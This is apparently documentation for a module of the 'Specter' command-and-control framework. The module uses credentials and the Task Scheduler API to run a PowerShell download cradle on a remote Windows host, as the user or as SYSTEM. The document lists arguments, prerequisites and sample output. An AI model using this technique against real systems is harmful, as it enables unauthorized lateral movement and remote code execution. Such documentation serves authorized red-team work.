Description
This script leverages the Task Scheduler API, username, and password to remotely execute a Specter PowerShell cradle.
Overview
This script leverages the Task Scheduler API to run a scheduled task on the operator specified system using username and password. A PowerShell cradle is executed as either the specified user or NT AUTHORITY\SYSTEM. The $Hostname parameter can be either hostname, FQDN, or IP.
Arguments
- System: The target hostname or IP address.
- Username: The user to authenticate with.
- Domain: The domain the user belongs to or leave blank if it is a local user.
- Password: The password for the specified user account.
- Profile: Run the task as the specified user or as NT AUTHORITY\SYSTEM.
- TaskName: The name of the scheduled task.
- Build: The Specter build identifier.
Dependencies
- Lateral
Operating Systems
- Windows
Pre-Requisites
- Valid credentials for the target systems.
- Scheduled Task service running on the target.
Example Output
{
"Lateral": {
"Username": "[email protected]",
"Build": "8af164d0e3d5487f821b85760b4ffb51",
"Payload": "ps_cradle",
"Success": true,
"Method": "Scheduled Task",
"TaskName": "CacheTask",
"System": "192.168.1.103"
}
}